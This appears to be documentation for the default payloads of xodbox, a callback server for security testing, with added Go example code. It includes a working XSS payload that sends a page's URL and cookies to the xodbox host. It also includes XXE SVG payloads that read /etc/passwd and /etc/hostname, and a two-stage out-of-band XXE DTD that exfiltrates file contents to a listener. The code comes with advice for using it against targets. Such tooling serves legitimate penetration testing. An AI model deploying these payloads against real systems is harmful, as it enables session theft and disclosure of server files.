
Default Payloads Seeds

seed data

Default payloads that come with xodbox.

1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

2 - Redirect

HTTP Redirects

Redirects to the URL given in the query parameter l, using the query parameter s as the HTTP status code.

What       Description              GET parameter
Location   URL to redirect to       l
Status     HTTP status code         s

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox
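As an added illustration (example code, not xodbox's own handler): a minimal Go net/http handler with the documented l and s behaviour. It adds a check the page does not state, accepting only 3xx values for s and falling back to 302 otherwise, so a typo in s cannot turn the endpoint into a non-redirect; the 302 fallback and the 400 on a missing l are this example's choices.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
)

// redirectStatus turns the s query parameter into an HTTP status code.
// Only 3xx codes are accepted; anything else (missing, non-numeric, 200,
// 500) falls back to 302 so the endpoint always answers with a redirect.
func redirectStatus(s string) int {
	code, err := strconv.Atoi(s)
	if err != nil || code < 300 || code > 399 {
		return http.StatusFound
	}
	return code
}

// redirHandler reproduces the documented behaviour: the Location header
// comes from l, the status code from s. Example handler, not xodbox's code.
func redirHandler(w http.ResponseWriter, r *http.Request) {
	q := r.URL.Query()
	location := q.Get("l")
	if location == "" {
		http.Error(w, "missing l parameter", http.StatusBadRequest)
		return
	}
	// http.Redirect sets Location and, for GET, a short HTML body.
	http.Redirect(w, r, location, redirectStatus(q.Get("s")))
}

// probe runs one request through the handler in-process and returns the
// status code and Location header, so the behaviour is checkable offline.
func probe(rawURL string) (int, string) {
	rec := httptest.NewRecorder()
	redirHandler(rec, httptest.NewRequest(http.MethodGet, rawURL, nil))
	return rec.Code, rec.Header().Get("Location")
}

func main() {
	for _, u := range []string{
		"/redir?l=https://github.com/defektive/xodbox&s=301",
		"/redir?l=https://github.com/defektive/xodbox&s=200", // not 3xx: 302
		"/redir?l=https://github.com/defektive/xodbox",       // no s: 302
	} {
		code, loc := probe(u)
		fmt.Printf("%-55s -> %d %s\n", u, code, loc)
	}
}
```

Run it with go run and compare against the curl output above; the second and third requests show the fallback that keeps the payload a redirect no matter what s contains.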

3 - Robots TXT

A restrictive robots.txt

Simple robots.txt that asks all crawlers not to index anything (well-behaved crawlers honour it; it does not enforce anything).

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

4 - Inspect

Reflect back HTTP requests in various formats

Depends on internal code.

/inspect

Inspect or reflect the request back in various formats.

  • Plain Text (default, .txt)
  • HTML (.html)
  • GIF (.gif)
  • JPEG (.jpg)
  • PNG (.png)
  • MP4 (.mp4)
  • XML (.xml)
  • JSON (.json)
  • JavaScript (.js)

Examples

  • http://localhost/inspect
  • http://localhost/some/random/path/inspect.gif
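An added example of the format-by-extension idea (example code, not xodbox's inspect implementation): the extension of the request path picks the output format, plain text being the default. Only the txt and json variants are written out here; the image, video and script variants listed above need a valid body of that type and are omitted. The field set reflected back is this example's choice.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"path"
	"strings"
)

// reflected is the subset of the request this example echoes back as JSON.
type reflected struct {
	Method  string              `json:"method"`
	Path    string              `json:"path"`
	Query   map[string][]string `json:"query"`
	Headers map[string][]string `json:"headers"`
	Remote  string              `json:"remote_addr"`
}

// formatFor selects the output format from the request path's extension
// (/inspect.json -> "json"); no extension means plain text, the default.
func formatFor(p string) string {
	if ext := strings.TrimPrefix(path.Ext(p), "."); ext != "" {
		return strings.ToLower(ext)
	}
	return "txt"
}

// inspectHandler reflects the request back in the selected format.
func inspectHandler(w http.ResponseWriter, r *http.Request) {
	switch formatFor(r.URL.Path) {
	case "json":
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(reflected{
			Method: r.Method, Path: r.URL.Path, Query: r.URL.Query(),
			Headers: r.Header, Remote: r.RemoteAddr,
		})
	default:
		// Plain text: the request in wire format, body included, as the
		// server saw it (httputil.DumpRequest is meant for the server side).
		dump, err := httputil.DumpRequest(r, true)
		if err != nil {
			http.Error(w, err.Error(), http.StatusInternalServerError)
			return
		}
		w.Header().Set("Content-Type", "text/plain; charset=utf-8")
		w.Write(dump)
	}
}

func main() {
	// Constructed sample request, so the example runs without a network.
	req := httptest.NewRequest(http.MethodPost, "/some/random/path/inspect.txt?probe=1", strings.NewReader("a=1"))
	req.Header.Set("X-Forwarded-For", "203.0.113.7")
	rec := httptest.NewRecorder()
	inspectHandler(rec, req)
	fmt.Print(rec.Body.String())
}
```

The plain-text dump is the most useful format when hunting for SSRF or blind injection, because it shows exactly which headers the intermediate system added or stripped.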

5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML page that loads the XSS JavaScript payload (/jsc).

6 - XSS JavaScript

Returns JS that loads an image from xodbox, producing a callback.

/jsc

Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload that proves execution and exfiltrates data.

(function (){
    // Create an <img> and point it at xodbox; the browser issues the
    // request as soon as src is set, so no user interaction is needed.
    var s = document.createElement("img");
    document.body.appendChild(s);
    // The Host placeholder is filled in server-side with the xodbox host.
    // The page URL and the cookies readable by script (HttpOnly cookies are
    // excluded) are sent unencoded as query parameters to /jscb.
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;
})()
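An added example (not xodbox's own code) of the two halves of this payload: rendering the Host placeholder with Go's text/template, and receiving the image request on /jscb. The template data struct, the callback struct and the 1x1 GIF response are this example's assumptions; the page says nothing about how xodbox names or stores them.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
	"net/http/httptest"
	"text/template"
)

// xssJS is the payload shown above, as a Go text/template. Rendering .Host
// makes the image request come back to the listener that served the JS.
const xssJS = `(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;
})()`

// renderPayload fills the Host placeholder. The data struct is this
// example's assumption; how xodbox names its template data is not on the page.
func renderPayload(host string) (string, error) {
	tmpl, err := template.New("jsc").Parse(xssJS)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, struct{ Host string }{host}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// callback holds what /jscb receives when the payload fires in a browser.
type callback struct {
	Source string // window.location of the page that ran the JS
	Cookie string // document.cookie; HttpOnly cookies never show up here
	Remote string // address the browser connected from
}

// parseCallback extracts the two parameters the payload appends. The payload
// does not URL-encode them, so a cookie value containing '&' or '#' is cut
// short; encodeURIComponent in the payload would avoid that.
func parseCallback(r *http.Request) callback {
	q := r.URL.Query()
	return callback{Source: q.Get("src"), Cookie: q.Get("c"), Remote: r.RemoteAddr}
}

// smallGIF is a 1x1 transparent GIF so the <img> never shows a broken icon.
var smallGIF = []byte("GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff" +
	"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

// jscbHandler logs the callback and answers with the image.
func jscbHandler(w http.ResponseWriter, r *http.Request) {
	cb := parseCallback(r)
	fmt.Printf("callback from %s: page=%s cookie=%q\n", cb.Remote, cb.Source, cb.Cookie)
	w.Header().Set("Content-Type", "image/gif")
	w.Write(smallGIF)
}

func main() {
	js, err := renderPayload("xodbox.test")
	if err != nil {
		panic(err)
	}
	fmt.Println(js)
	// Simulate the browser's image request (constructed sample values).
	rec := httptest.NewRecorder()
	jscbHandler(rec, httptest.NewRequest(http.MethodGet,
		"/jscb?src=http://victim.test/profile&c=session=abc123", nil))
	fmt.Println(rec.Header().Get("Content-Type"), len(rec.Body.Bytes()), "bytes")
}
```

When adapting the payload, keep in mind that a session cookie flagged HttpOnly will never appear in c; the src parameter still proves execution on the victim origin.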

7 - Default Favicon

Redirects to the default logo.

Redirects to the default logo, which is served from the binary's embedded filesystem.

Example Request

curl -i http://xodbox.test/favicon.ico

8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"


10 - XXE Callback

More XXE

Callback endpoint used by the xxe-system payload.

11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

DTD for use by other payloads.

12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

Attempts to read /etc/hostname.

SVG with XXE payloads

13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

Attempts to read /etc/passwd.

14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

Attempts to read whatever file is supplied via the f query parameter.

15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator
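An added example for sections 10 to 15 (example code, not the payloads xodbox actually serves, which the page does not show): the generic shape of the in-band SVG payloads (/sh, /sp, /sv) and of the two-stage out-of-band chain behind the DTD, system and callback payloads (/dt, /evil.dtd and the callback). The callback path /xxecb and the entity names are this example's assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// svgXXE returns an SVG whose <text> node expands an external entity that
// points at a local file: the in-band form /sh (/etc/hostname), /sp
// (/etc/passwd) and /sv (path from the f parameter) describe. Whatever
// rasterises the SVG draws the file contents into the image.
func svgXXE(file string) string {
	return `<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://` + file + `"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="600" height="100">
  <text x="10" y="40" font-family="monospace">&xxe;</text>
</svg>
`
}

// oobDocument is the document handed to the target. It only pulls in an
// external DTD from the listener; XML forbids parameter-entity references
// inside entity values in the internal subset, which is why the second
// stage has to live in a separately served DTD (/evil.dtd above).
func oobDocument(host string) string {
	return `<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://` + host + `/evil.dtd">
  %dtd;
]>
<data>xodbox</data>
`
}

// oobDTD is the second stage: read the file into a parameter entity, then
// define and trigger an entity whose SYSTEM URL carries the contents back
// to the listener. &#x25; is '%' escaped so the inner declaration is only
// built when %eval; expands. callbackPath is an assumption of this example;
// the page does not give the callback endpoint's path.
func oobDTD(host, callbackPath, file string) string {
	return `<!ENTITY % file SYSTEM "file://` + file + `">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://` + host + callbackPath + `?d=%file;'>">
%eval;
%exfil;
`
}

// declaresExternalEntity is a naive triage check for uploaded XML/SVG: does
// it declare an entity with an external identifier? Real protection is to
// disable DTD loading and entity expansion in the parser, not string matching.
func declaresExternalEntity(doc string) bool {
	up := strings.ToUpper(doc)
	return strings.Contains(up, "<!ENTITY") &&
		(strings.Contains(up, " SYSTEM ") || strings.Contains(up, " PUBLIC "))
}

func main() {
	fmt.Println(svgXXE("/etc/hostname"))
	fmt.Println(oobDocument("xodbox.test"))
	fmt.Println(oobDTD("xodbox.test", "/xxecb", "/etc/hostname"))
	fmt.Println("flagged:", declaresExternalEntity(svgXXE("/etc/passwd")))
}
```

Two caveats worth keeping in mind when using these against a target: the out-of-band variant only works for files whose contents fit in a URL (no newlines), which is why /etc/hostname is the usual probe and /etc/passwd is reserved for the in-band SVG; and none of this fires against a parser that does not resolve external entities (Go's encoding/xml, for one, does no DTD processing at all), so a silent result means either a hardened parser or no parse, not necessarily "not vulnerable".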

16 - Default Page

returns a simple page if nothing is matched

Catch-all response returned when no other payload matches the request.

Example Request

curl -i http://xodbox.test/

Example Response

hi

17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

17.1 - WPAD

Returns a WPAD config file (Javascript).

WPAD proxy auto-config. Not really useful at the moment; it should become more useful in the future.